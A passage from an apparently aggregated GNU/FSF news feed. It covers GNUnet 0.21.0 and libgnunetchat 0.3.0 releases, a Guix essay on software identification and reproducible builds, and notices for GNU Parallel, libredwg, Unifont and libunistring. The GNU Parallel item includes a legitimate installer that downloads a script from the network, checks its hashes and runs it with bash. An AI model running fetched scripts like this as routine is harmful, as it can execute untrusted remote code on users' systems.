early after the release. For direct access try
<a href="http://ftp.gnu.org/gnu/gnunet/">
http://ftp.gnu.org/gnu/gnunet/
</a>
</p>
</article>2024-03-07T23:00:00+00:00GNUnet NewsFSF Blogs: Welcome attendees, get to know speakers first hand, and make LibrePlanet a unique experience
http://www.fsf.org/blogs/community/welcome-attendees-get-to-know-speakers-first-hand-and-make-libreplanet-a-unique-experience
We need your help to make the world's premier gathering of free software enthusiasts a success. Would you like to volunteer at LibrePlanet 2024 and play an important part in making the conference a unique experience?2024-03-07T20:30:00+00:00FSF BlogsGNUnet News: libgnunetchat 0.3.0
https://gnunet.org/en/news/2024-03-libgnunetchat-0.3.0.html
<article id="newspost-content">
<h1>
libgnunetchat 0.3.0 released
</h1>
<p>
We are pleased to announce the release of libgnunetchat 0.3.0.
<br />
This is a major new release bringing compatibility with the major changes in the Messenger service from latest GNUnet release 0.21.0 adding new message kinds, adjusting message processing and key management. This release will also require your GNUnet to be at least 0.21.0 because of that.
</p>
<h4>
Download links
</h4>
<ul>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/libgnunetchat-0.3.0.tar.gz">
libgnunetchat-0.3.0.tar.gz
</a>
</li>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/libgnunetchat-0.3.0.tar.gz.sig">
libgnunetchat-0.3.0.tar.gz.sig
</a>
</li>
</ul>
<p>
The GPG key used to sign is:
<a href="https://gnunet.org/~schanzen/3D11063C10F98D14BD24D1470B0998EF86F59B6A">
3D11063C10F98D14BD24D1470B0998EF86F59B6A
</a>
</p>
<p>
Note that due to mirror synchronization, not all links may be functional
early after the release. For direct access try
<a href="http://ftp.gnu.org/gnu/gnunet/">
http://ftp.gnu.org/gnu/gnunet/
</a>
</p>
<h4>
Noteworthy changes in 0.3.0
</h4>
<ul>
<li>
This release requires the GNUnet Messenger Service 0.3!
</li>
<li>
It allows ticket management for tickets sent from contacts.
</li>
<li>
Deletions or other updates of messages result in separate event calls.
</li>
<li>
It is possible to tag messages or contacts.
</li>
<li>
Invitations can be rejected via tag messages.
</li>
<li>
Contacts can be blocked or unblocked which results in filtering messages.
</li>
<li>
Processing of messages is ensured by enforcing logical order of callbacks while querying old messages.
</li>
<li>
Private messages are readable to its sender.
</li>
<li>
Messages provide information about its recipient.
</li>
<li>
Logouts get processed on application level on exit.
</li>
<li>
Delays message callbacks depending on message kind (deletion with custom delay).
</li>
<li>
New debug tools are available to visualize the message graph.
</li>
<li>
Add test case for message receivement.
</li>
<li>
Multiple issues are fixed.
</li>
</ul>
<p>
A detailed list of changes can be found in the
<a href="https://git.gnunet.org/libgnunetchat.git/tree/ChangeLog">
ChangeLog
</a>
.
</p>
</article>2024-03-06T23:00:00+00:00GNUnet NewsFSF Blogs: The shop is open! Get your LibrePlanet 2024 T-shirt and our newest swag!
http://www.fsf.org/blogs/gnu-press/the-shop-is-open-get-your-libreplanet-2024-t-shirt-and-our-newest-swag
2024-03-05T23:30:00+00:00FSF BlogsGNUnet News: GNUnet 0.21.0
https://gnunet.org/en/news/2024-03-0.21.0.html
<article id="newspost-content">
<h1>
GNUnet 0.21.0 released
</h1>
<p>
We are pleased to announce the release of GNUnet 0.21.0.
<br />
GNUnet is an alternative network stack for building secure, decentralized and
privacy-preserving distributed applications.
Our goal is to replace the old insecure Internet protocol stack.
Starting from an application for secure publication of files, it has grown to
include all kinds of basic protocol components and applications towards the
creation of a GNU internet.
</p>
<p>
This release marks a noteworthy milestone in that it includes a completely
new
<a href="https://docs.gnunet.org/v0.21.0/users/subsystems.html#transport-ng-next-generation-transport-management">
transport layer
</a>
.
It lays the groundwork for fixing some major design issues and may also
already alleviate a variety of issues seen in previous releases related to
connectivity.
This change also deprecates our testbed and ATS subsystem.
</p>
<p>
This is a new major release.
It breaks protocol compatibility with the 0.20.x versions.
Please be aware that Git master is thus henceforth (and has been for a
while)
<b>
INCOMPATIBLE
</b>
with
the 0.20.x GNUnet network, and interactions between old and new peers
will result in issues.
In terms of usability, users should be aware that there are still
<b>
a number of known open issues
</b>
in particular with respect to ease
of use, but also some critical privacy issues especially for mobile users.
Also, the nascent network is tiny and thus unlikely to
provide good anonymity or extensive amounts of interesting information.
As a result, the 0.21.0 release is still
<b>
only suitable for early adopters
with some reasonable pain tolerance
</b>
.
</p>
<h4>
Download links
</h4>
<ul>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/gnunet-0.21.0.tar.gz">
gnunet-0.21.0.tar.gz
</a>
(
<a href="http://ftpmirror.gnu.org/gnunet/gnunet-0.21.0.tar.gz.sig">
signature
</a>
)
</li>
<li>
<a href="https://buildbot.gnunet.org/releases/gnunet-0.21.0-meson.tar.gz">
gnunet-0.21.0-meson.tar.gz
</a>
(
<a href="https://buildbot.gnunet.org/releases/gnunet-0.21.0-meson.tar.gz.sig">
signature
</a>
)
<i>
NEW: Test tarball made using the meson build system.
</i>
</li>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/gnunet-gtk-0.21.0.tar.gz">
gnunet-gtk-0.21.0.tar.gz
</a>
(
<a href="http://ftpmirror.gnu.org/gnunet/gnunet-gtk-0.21.0.tar.gz.sig">
signature
</a>
)
</li>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/gnunet-fuse-0.21.0.tar.gz">
gnunet-fuse-0.21.0.tar.gz
</a>
(
<a href="http://ftpmirror.gnu.org/gnunet/gnunet-fuse-0.21.0.tar.gz.sig">
signature
</a>
)
</li>
</ul>
<p>
The GPG key used to sign is:
<a href="https://www.gnunet.org/~schanzen/3D11063C10F98D14BD24D1470B0998EF86F59B6A">
3D11063C10F98D14BD24D1470B0998EF86F59B6A
</a>
</p>
<p>
Note that due to mirror synchronization, not all links might be functional
early after the release. For direct access try
<a href="http://ftp.gnu.org/gnu/gnunet/">
http://ftp.gnu.org/gnu/gnunet/
</a>
</p>
<h4>
Changes
</h4>
<p>
A detailed list of changes can be found in the
<a href="https://git.gnunet.org/gnunet.git/log/?h=v0.21.0">
git log
</a>
, the
<a href="https://git.gnunet.org/gnunet.git/tree/NEWS?h=v0.21.0">
NEWS
</a>
and
the
<a href="https://bugs.gnunet.org/changelog_page.php?version_id=417">
bug tracker
</a>
.
</p>
<h4>
Known Issues
</h4>
<ul>
<li>
There are known major design issues in the CORE subsystems which will need to be addressed in the future to achieve acceptable usability, performance and security.
</li>
<li>
There are known moderate implementation limitations in CADET that negatively impact performance.
</li>
<li>
There are known moderate design issues in FS that also impact usability and performance.
</li>
<li>
There are minor implementation limitations in SET that create unnecessary attack surface for availability.
</li>
<li>
The RPS subsystem remains experimental.
</li>
</ul>
<p>
In addition to this list, you may also want to consult our bug tracker at
<a href="https://bugs.gnunet.org/">
bugs.gnunet.org
</a>
which lists about 190 more specific issues.
</p>
<h4>
Thanks
</h4>
<p>
This release was the work of many people. The following people contributed code and were thus easily identified:
Christian Grothoff, t3sserakt, TheJackiMonster, Pedram Fardzadeh, dvn, Sebastian Nadler and Martin Schanzenbach.
</p>
</article>2024-03-05T23:00:00+00:00GNUnet NewsFSF Events: Free Software Directory meeting on IRC: Friday, March 08, starting at 12:00 EST (17:00 UTC)
http://www.fsf.org/events/fsd-20240308-irc
Description: Join the FSF and friends on Friday, March 08, from 12:00 to 15:00 EST (17:00 to 20:00 UTC) to help improve the Free Software Directory.2024-03-04T19:35:10+00:00FSF EventsGNU Guix: Identifying software
https://guix.gnu.org/blog/2024/identifying-software//
<p>What does it take to “identify software”? How can we tell what software
is running on a machine to determine, for example, what security
vulnerabilities might affect it?</p><p>In October 2023, the US Cybersecurity and Infrastructure Security Agency
(CISA) published a white paper entitled <a href="https://www.cisa.gov/resources-tools/resources/software-identification-ecosystem-option-analysis"><em>Software Identification
Ecosystem Option
Analysis</em></a>
that looks at existing options to address these questions. The
publication was followed by a <a href="https://www.regulations.gov/document/CISA-2023-0026-0001">request for
comments</a>; our
<a href="https://git.savannah.gnu.org/cgit/guix/maintenance.git/plain/doc/cisa-2023-0026-0001/cisa-2023-0026-0001.pdf">comment</a>
as Guix developers didn’t make it on time to be published, but we’d like
to share it here.</p><p>Software identification for cybersecurity purposes is a crucial topic,
as the white paper explains in its introduction:</p><blockquote><p>Effective vulnerability management requires software to be trackable
in a way that allows correlation with other information such as known
vulnerabilities […]. This correlation is only possible when different
cybersecurity professionals know they are talking about the same
software.</p></blockquote><p>The <a href="https://en.wikipedia.org/wiki/Common_Platform_Enumeration">Common Platform Enumeration
(CPE)</a>
standard has been designed to fill that role; it is used to identify
software as part of the well-known <a href="https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures">Common Vulnerabilities and Exposures
(CVE)</a>
process. But CPE is showing its limits as an <em>extrinsic identification
mechanism</em>: the human-readable identifiers chosen by CPE fail to capture
the complexity of what “software” is.</p><p>We think functional software deployment as implemented by Nix and Guix,
coupled with the source code identification work carried out by Software
Heritage, provides a unique perspective on these matters.</p><h1>On Software Identification</h1><p>The <em>Software Identification Ecosystem Option Analysis</em> white paper
released by CISA in October 2023 studies options towards the definition
of <em>a software identification ecosystem that can be used across the
complete, global software space for all key cybersecurity use cases</em>.</p><p>Our experience lies in the design and development of
<a href="https://guix.gnu.org">GNU Guix</a>, a package manager, software deployment
tool, and GNU/Linux distribution, which emphasizes three key elements:
<strong>reproducibility, provenance tracking, and auditability</strong>. We explain
in the following sections our approach and how it relates to the goal
stated in the aforementioned white paper.</p><p>Guix produces binary artifacts of varying complexity from source code:
package binaries, application bundles (container images to be consumed
by Docker and related tools), system installations, system bundles
(container and virtual machine images).</p><p>All these artifacts qualify as “software” and so does source code. Some
of this “software” comes from well-identified upstream packages,
sometimes with modifications added downstream by packagers (patches);
binary artifacts themselves are the byproduct of a build process where
the package manager uses <em>other</em> binary artifacts it previously built
(compilers, libraries, etc.) along with more source code (the package
definition) to build them. How can one identify “software” in that
sense?</p><p>Software is dual: it exists in <em>source</em> form and in <em>binary</em>,
machine-executable form. The latter is the outcome of a complex
computational process taking source code and intermediary binaries as
input.</p><p>Our thesis can be summarized as follows:</p><blockquote><p><strong>We consider that the requirements for source code identifiers differ
from the requirements to identify binary artifacts.</strong></p><p>Our view, embodied in GNU Guix, is that:</p><ol><li><p><strong>Source code</strong> can be identified in an unambiguous and
distributed fashion through <em>inherent identifiers</em> such as
cryptographic hashes.</p></li><li><p><strong>Binary artifacts</strong>, instead, need to be the byproduct of a
<em>comprehensive and verifiable build process itself available as
source code</em>.</p></li></ol></blockquote><p>In the next sections, to clarify the context of this statement, we show
how Guix identifies source code, how it defines the <em>source-to-binary</em>
path and ensures its verifiability, and how it provides provenance
tracking.</p><h1>Source Code Identification</h1><p>Guix includes <a href="https://guix.gnu.org/manual/en/html_node/Defining-Packages.html">package
definitions</a>
for almost 30,000 packages. Each package definition identifies its
<a href="https://guix.gnu.org/manual/en/html_node/origin-Reference.html">origin</a>—its
“main” source code as well as patches. The origin is
<strong>content-addressed</strong>: it includes a SHA256 cryptographic hash of the
code (an <em>inherent identifier</em>), along with a primary URL to download
it.</p><p>Since source is content-addressed, the URL can be thought of as a hint.
Indeed, <strong>we connected Guix to the <a href="https://www.softwareheritage.org">Software
Heritage</a> source code archive</strong>: when
source code vanishes from its original URL, Guix falls back to
downloading it from the archive. This is made possible thanks to the use
of inherent (or intrinsic) identifiers both by Guix and Software
Heritage.</p><p>More information can be found in this <a href="https://guix.gnu.org/en/blog/2019/connecting-reproducible-deployment-to-a-long-term-source-code-archive/">2019 blog
post</a>
and in the documents of the <a href="https://www.swhid.org/">Software Hash Identifiers
(SWHID)</a> working group.</p><h1>Reproducible Builds</h1><p>Guix provides a <strong>verifiable path from source code to binaries</strong> by
ensuring <a href="https://reproducible-builds.org">reproducible builds</a>. To
achieve that, Guix builds upon the pioneering research work of Eelco
Dolstra that led to the design of the <a href="https://nixos.org">Nix package
manager</a>, with which it shares the same conceptual
foundation.</p><p>Namely, Guix relies on <em>hermetic builds</em>: builds are performed in
isolated environments that contain nothing but explicitly-declared
dependencies—where a “dependency” can be the output of another build
process or source code, including build scripts and patches.</p><p>An implication is that <strong>builds can be verified independently</strong>. For
instance, for a given version of Guix, <code>guix build gcc</code>
should produce the exact same binary, bit-for-bit. To facilitate
independent verification, <code>guix challenge gcc</code> compares the
binary artifacts of the GNU Compiler Collection (GCC) as built and
published by different parties. Users can also compare to a local build
with <code>guix build gcc --check</code>.</p><p>As with Nix, build processes are identified by <em>derivations</em>, which are
low-level, content-addressed build instructions; derivations may refer
to other derivations and to source code. For instance,
<code>/gnu/store/c9fqrmabz5nrm2arqqg4ha8jzmv0kc2f-gcc-11.3.0.drv</code>
uniquely identifies the derivation to build a specific variant of
version 11.3.0 of the GNU Compiler Collection (GCC). Changing the
package definition—patches being applied, build flags, set of
dependencies—, or similarly changing one of the packages it depends
on, leads to a different derivation (more information can be found in
<a href="https://edolstra.github.io/pubs/phd-thesis.pdf">Eelco Dolstra's PhD
thesis</a>).</p><p>Derivations form a graph that <strong>captures the entirety of the build
processes leading to a binary artifact</strong>. In contrast, mere package
name/version pairs such as <code>gcc 11.3.0</code> fail to capture the
breadth and depth elements that lead to a binary artifact. This is a
shortcoming of systems such as the <strong>Common Platform Enumeration</strong> (CPE)
standard: it fails to express whether a vulnerability that applies to
<code>gcc 11.3.0</code> applies to it regardless of how it was built,
patched, and configured, or whether certain conditions are required.</p><h1>Full-Source Bootstrap</h1><p>Reproducible builds alone cannot ensure the source-to-binary
correspondence: the compiler could contain a backdoor, as demonstrated
by Ken Thompson in <em>Reflections on Trusting Trust</em>. To address that,
Guix goes further by implementing so-called <strong>full-source bootstrap</strong>:
for the first time, literally every package in the distribution is built
from source code, <a href="https://guix.gnu.org/en/blog/2023/the-full-source-bootstrap-building-from-source-all-the-way-down/">starting from a very small binary
seed</a>.
This gives an unprecedented level of transparency, allowing code to be
audited at all levels, and improving robustness against the
“trusting-trust attack” described by Ken Thompson.</p><p>The European Union recognized the importance of this work through an
<a href="https://nlnet.nl/project/GNUMes-fullsource/">NLnet Privacy & Trust Enhancing Technologies (NGI0 PET)
grant</a> allocated in
2021 to Jan Nieuwenhuizen to further work on full-source bootstrap in
GNU Guix, GNU Mes, and related projects, followed by <a href="https://nlnet.nl/project/GNUMes-ARM_RISC-V/">another
grant</a> in 2022 to expand
support to the Arm and RISC-V CPU architectures.</p><h1>Provenance Tracking</h1><p>We define provenance tracking as the ability <strong>to map a binary artifact
back to its complete corresponding source</strong>. Provenance tracking is
necessary to allow the recipient of a binary artifact to access the
corresponding source code and to verify the source/binary correspondence
if they wish to do so.</p><p>The
<a href="https://guix.gnu.org/manual/en/html_node/Invoking-guix-pack.html"><code>guix pack</code></a>
command can be used to build, for instance, containers images. Running
<code>guix pack -f docker python --save-provenance</code> produces a
<em>self-describing Docker image</em> containing the binaries of Python and its
run-time dependencies. The image is self-describing because
<code>--save-provenance</code> flag leads to the inclusion of a
<em>manifest</em> that describes which revision of Guix was used to produce
this binary. A third party can retrieve this revision of Guix and from
there view the entire build dependency graph of Python, view its source
code and any patches that were applied, and recursively for its
dependencies.</p><p>To summarize, capturing the revision of Guix that was used is all it
takes to <em>reproduce</em> a specific binary artifact. This is illustrated by
<a href="https://guix.gnu.org/manual/en/html_node/Invoking-guix-time_002dmachine.html">the <code>time-machine</code>
command</a>.
The example below deploys, <em>at any time on any machine</em>, the specific
build artifact of the <code>python</code> package as it was defined in this Guix
commit:</p><pre><code class="language-example">guix time-machine -q --commit=d3c3922a8f5d50855165941e19a204d32469006f \
-- install python</code></pre><p>In other words, because Guix itself defines how artifacts are built,
<strong>the revision of the Guix source coupled with the package name
unambiguously identify the package’s binary artifact</strong>. As
scientists, we build on this property to achieve reproducible research
workflows, as explained in this <a href="https://doi.org/10.1038/s41597-022-01720-9">2022 article in <em>Nature Scientific
Data</em></a>; as engineers, we
value this property to analyze the systems we are running and determine
which known vulnerabilities and bugs apply.</p><p>Again, a software bill of materials (SBOM) written as a mere list of
package name/version pairs would fail to capture as much information.
The <strong>Artifact Dependency Graph (ADG) of
<a href="https://omnibor.io/">OmniBOR</a></strong>, while less ambiguous, falls short in
two ways: it is too fine-grained for typical cybersecurity applications
(at the level of individual source files), and it only captures the
alleged source/binary correspondence of individual files but not the
process to go from source to binary.</p><h1>Conclusions</h1><p>Inherent identifiers lend themselves well to unambiguous source code
identification, as demonstrated by Software Heritage, Guix, and Nix.</p><p>However, we believe binary artifacts should instead be treated as the
result of a computational process; it is that process that needs to be
fully captured to support <strong>independent verification of the
source/binary correspondence</strong>. For cybersecurity purposes, recipients
of a binary artifact must be able to be map it back to its source code
(<em>provenance tracking</em>), with the additional guarantee that they must be
able to reproduce the entire build process to verify the source/binary
correspondence (<em>reproducible builds and full-source bootstrap</em>). As
long as binary artifacts result from a reproducible build process,
itself described as source code, <strong>identifying binary artifacts boils
down to identifying the source code of their build process</strong>.</p><p>These ideas are developed in the 2022 scientific paper <a href="https://doi.org/10.22152/programming-journal.org/2023/7/1"><em>Building a
Secure Software Supply Chain with
GNU Guix</em></a></p>2024-03-04T15:00:00+00:00Ludovic Courtès, Maxim Cournoyer, Jan Nieuwenhuizen, Simon TournierFSF Blogs: February GNU Spotlight with Amin Bandali: Nineteen new GNU releases!
http://www.fsf.org/blogs/community/february-gnu-spotlight-with-amin-bandali-nineteen-new-gnu-releases
2024-03-01T17:19:51+00:00FSF Blogswww-zh-cn @ Savannah: LibrePlanet 2024: Cultivating Community - Agenda is fresh out!
https://savannah.gnu.org/news/?id=10603
<p><a href="https://www.fsf.org/blogs/community/exciting-talks-hands-on-workshops-and-thrilling-discussions-await-you-at-libreplanet-2024">https://www.fsf.org/blogs/community/exciting-talks-hands-on-workshops-and-thrilling-discussions-await-you-at-libreplanet-2024</a>
<br />
<br />
Examples for sessions on cultivating community we are looking forward to are:
<br />
<br />
"Fostering and renewing community in a long-lived free software project" by T. Kim Nguyen;
<br />
"Empowering youth in the digital age: A path to success" by Leonardo Champion;
<br />
"Connecting community organizations and technological activists for software freedom" by Christina Haralanova;
<br />
"Hosting freedom - A behind-the-scenes tour with the Savannah Hackers" by Corwin Brust; or
<br />
"It is easy to contribute to GNU" by Wensheng Xie.
<br />
<br />
I will be talking there. If you have anything to say, please let me know.
<br />
<br />
<br />
Please
<br />
<br />
<a href="https://my.fsf.org/civicrm/event/info?reset=1&id=125">https://my.fsf.org/civicrm/event/info?reset=1&id=125</a>
<br />
or
<br />
<a href="https://my.fsf.org/civicrm/event/info?reset=1&id=126">https://my.fsf.org/civicrm/event/info?reset=1&id=126</a>
<br />
<br />
Happy Hacking
<br />
wxie<br />
</p>2024-02-28T14:56:55+00:00Wensheng XIEparallel @ Savannah: GNU Parallel 20240222 ('Навальный') released [stable]
https://savannah.gnu.org/news/?id=10602
<p>GNU Parallel 20240222 ('Навальный') has been released. It is available for download at: lbry://@GnuParallel:4
<br />
<br />
Quote of the month:
<br />
<br />
Stop paralyzing start parallelizing
<br />
-- @harshgandhi100@YouTube
<br />
<br />
New in this release:
<br />
</p>
<ul>
<li>No new functionality
</li>
<li>Bug fixes and man page updates.
</li>
</ul>
<p>GNU Parallel - For people who live life in the parallel lane.
<br />
<br />
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
<br />
<br />
<br />
</p>
<h2>About GNU Parallel</h2>
<p>
<br />
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
<br />
<br />
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
<br />
<br />
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
<br />
<br />
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
<br />
<br />
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
<br />
<br />
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
<br />
<br />
find . -name '*.jpg' |
<br />
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
<br />
<br />
You can find more about GNU Parallel at: <a href="http://www.gnu.org/s/parallel/">http://www.gnu.org/s/parallel/</a>
<br />
<br />
You can install GNU Parallel in just 10 seconds with:
<br />
<br />
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
<br />
fetch -o - <a href="http://pi.dk/3">http://pi.dk/3</a> ) > install.sh
<br />
$ sha1sum install.sh | grep 883c667e01eed62f975ad28b6d50e22a
<br />
12345678 883c667e 01eed62f 975ad28b 6d50e22a
<br />
$ md5sum install.sh | grep cc21b4c943fd03e93ae1ae49e28573c0
<br />
cc21b4c9 43fd03e9 3ae1ae49 e28573c0
<br />
$ sha512sum install.sh | grep ec113b49a54e705f86d51e784ebced224fdff3f52
<br />
79945d9d 250b42a4 2067bb00 99da012e c113b49a 54e705f8 6d51e784 ebced224
<br />
fdff3f52 ca588d64 e75f6033 61bd543f d631f592 2f87ceb2 ab034149 6df84a35
<br />
$ bash install.sh
<br />
<br />
Watch the intro video on <a href="http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1">http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1</a>
<br />
<br />
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
<br />
<br />
When using programs that use GNU Parallel to process data for publication please cite:
<br />
<br />
O. Tange (2018): GNU Parallel 2018, March 2018, <a href="https://doi.org/10.5281/zenodo.1146014">https://doi.org/10.5281/zenodo.1146014</a>.
<br />
<br />
If you like GNU Parallel:
<br />
<br />
</p>
<ul>
<li>Give a demo at your local user group/team/colleagues
</li>
<li>Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
</li>
<li>Get the merchandise <a href="https://gnuparallel.threadless.com/designs/gnu-parallel">https://gnuparallel.threadless.com/designs/gnu-parallel</a>
</li>
<li>Request or write a review for your favourite blog or magazine
</li>
<li>Request or build a package for your favourite distribution (if it is not already there)
</li>
<li>Invite me for your next conference
</li>
</ul>
<p>
<br />
If you use programs that use GNU Parallel for research:
<br />
<br />
</p>
<ul>
<li>Please cite GNU Parallel in you publications (use --citation)
</li>
</ul>
<p>
<br />
If GNU Parallel saves you money:
<br />
<br />
</p>
<ul>
<li>(Have your company) donate to FSF <a href="https://my.fsf.org/donate/">https://my.fsf.org/donate/</a>
</li>
</ul>
<p>
<br />
<br />
</p>
<h2>About GNU SQL</h2>
<p>
<br />
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
<br />
<br />
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
<br />
<br />
When using GNU SQL for a publication please cite:
<br />
<br />
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
<br />
<br />
<br />
</p>
<h2>About GNU Niceload</h2>
<p>
<br />
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.<br />
</p>2024-02-28T00:17:33+00:00Ole TangeFSF Blogs: Exciting talks, hands-on workshops, and thrilling discussions await you at LibrePlanet 2024
http://www.fsf.org/blogs/community/exciting-talks-hands-on-workshops-and-thrilling-discussions-await-you-at-libreplanet-2024
In this blog post, we're sharing with you all the sessions that have been
confirmed for LibrePlanet 2024: Cultivating Community.2024-02-27T20:40:00+00:00FSF BlogsFSF Blogs: FOSDEM 2024: two days on software freedom
http://www.fsf.org/blogs/community/fosdem-2024-two-days-on-software-freedom
We depend on software as a society. In such a world, software freedom has to be protected. Free Software Foundation's (FSF) Licensing and Compliance Manager, Krzysztof Siewicz is sharing his personal account of FOSDEM 2024.2024-02-26T20:35:00+00:00FSF BlogsFSF Events: Free Software Directory meeting on IRC: Friday, March 01, starting at 12:00 EST (17:00 UTC)
http://www.fsf.org/events/fsd-20240301-irc
Join the FSF and friends on Friday, March 01, from 12:00 to 15:00 EST (17:00 to 20:00 UTC) to help improve the Free Software Directory.2024-02-26T17:58:50+00:00FSF Eventslibredwg @ Savannah: libredwg-0.13.3 released
https://savannah.gnu.org/news/?id=10601
<p>A minor bugfix release, mostly fixes missing dwg2ps.1
<br />
<br />
See <a href="https://www.gnu.org/software/libredwg/">https://www.gnu.org/software/libredwg/</a> and <a href="https://git.savannah.gnu.org/cgit/libredwg.git/tree/NEWS?h=0.13.3">https://git.savannah.gnu.org/cgit/libredwg.git/tree/NEWS?h=0.13.3</a>
<br />
<br />
Here are the compressed sources:
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.gz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.gz</a> (20.1MB)
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.xz">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.xz</a> (10.1MB)
<br />
<br />
Here are the GPG detached signatures[*]:
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.gz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.gz.sig</a>
<br />
<a href="http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.xz.sig">http://ftp.gnu.org/gnu/libredwg/libredwg-0.13.3.tar.xz.sig</a>
<br />
<br />
Use a mirror for higher download bandwidth:
<br />
<a href="https://www.gnu.org/order/ftp.html">https://www.gnu.org/order/ftp.html</a>
<br />
<br />
Here are more binaries:
<br />
<a href="https://github.com/LibreDWG/libredwg/releases/tag/0.13.3">https://github.com/LibreDWG/libredwg/releases/tag/0.13.3</a>
<br />
<br />
Here are the SHA256 checksums:
<br />
<br />
<br />
[*] Use a .sig file to verify that the corresponding file (without the
<br />
.sig suffix) is intact. First, be sure to download both the .sig file
<br />
and the corresponding tarball. Then, run a command like this:
<br />
<br />
gpg --verify libredwg-0.13.3.tar.gz.sig
<br />
<br />
If that command fails because you don't have the required public key,
<br />
then run this command to import it:
<br />
<br />
gpg --recv-keys B4F63339E65D6414
<br />
<br />
and rerun the gpg --verify command.<br />
</p>2024-02-26T09:46:29+00:00Reini Urbanunifont @ Savannah: Unifont 15.1.05 Released
https://savannah.gnu.org/news/?id=10600
<p><b>24 February 2024</b> Unifont 15.1.05 is now available. This release adds the 222 CJK Unified Ideographs Extension D glyphs (U+2B740..U+2B81D) and 335 Plane 2 and Plane 3 common Cantonese ideographs, as well as other additions amounting to almost 600 ideograph additions, from <b>Boris Zhang, Yzy32767,</b> and others.
<br />
<br />
This release also replaces the Hangul blocks outside the Hangul Syllables range with new glyphs from <b>Ho-seok Ee</b> that are now consistent with the style of the Hangul Syllables glyphs.
<br />
<br />
Other minor changes are also included. Details are in the ChangeLog file.
<br />
<br />
This release no longer builds TrueType fonts by default, as announced over the past year. They have been replaced with their OpenType equivalents. TrueType fonts can still be built manually by typing "make truetype" in the font directory.
<br />
<br />
Download this release from GNU server mirrors at:
<br />
<br />
<a href="https://ftpmirror.gnu.org/unifont/unifont-15.1.05/">https://ftpmirror.gnu.org/unifont/unifont-15.1.05/</a>
<br />
<br />
or if that fails,
<br />
<br />
<a href="https://ftp.gnu.org/gnu/unifont/unifont-15.1.05/">https://ftp.gnu.org/gnu/unifont/unifont-15.1.05/</a>
<br />
<br />
or, as a last resort,
<br />
<br />
<a href="ftp://ftp.gnu.org/gnu/unifont/unifont-15.1.05/">ftp://ftp.gnu.org/gnu/unifont/unifont-15.1.05/</a>
<br />
<br />
These files are also available on the unifoundry.com website:
<br />
<br />
<a href="https://unifoundry.com/pub/unifont/unifont-15.1.05/">https://unifoundry.com/pub/unifont/unifont-15.1.05/</a>
<br />
<br />
Font files are in the subdirectory
<br />
<br />
<a href="https://unifoundry.com/pub/unifont/unifont-15.1.05/font-builds/">https://unifoundry.com/pub/unifont/unifont-15.1.05/font-builds/</a>
<br />
<br />
A more detailed description of font changes is available at
<br />
<br />
<a href="https://unifoundry.com/unifont/index.html">https://unifoundry.com/unifont/index.html</a>
<br />
<br />
and of utility program changes at
<br />
<br />
<a href="https://unifoundry.com/unifont/unifont-utilities.html">https://unifoundry.com/unifont/unifont-utilities.html</a>
<br />
<br />
Information about Hangul modifications is at
<br />
<br />
<a href="https://unifoundry.com/hangul/index.html">https://unifoundry.com/hangul/index.html</a>
<br />
<br />
and
<br />
<br />
<a href="http://unifoundry.com/hangul/hangul-generation.html">http://unifoundry.com/hangul/hangul-generation.html</a><br />
</p>2024-02-25T01:56:38+00:00Paul Hardylibunistring @ Savannah: GNU libunistring-1.2 released
https://savannah.gnu.org/news/?id=10599
<p>Download from <a href="https://ftp.gnu.org/gnu/libunistring/libunistring-1.2.tar.gz">https://ftp.gnu.org/gnu/libunistring/libunistring-1.2.tar.gz</a>
<br />
<br />
This is a stable release.
<br />
<br />
New in this release:
<br />
<br />
</p>
<ul>
<li>The data tables and algorithms have been updated to Unicode version 15.1.0.
</li>
<li>New functions u8_pcpy, u16_pcpy, u32_pcpy, similar to mempcpy.
</li>
<li>New functions uc_indic_conjunct_break_name, uc_indic_conjunct_break_byname, uc_indic_conjunct_break.
</li>
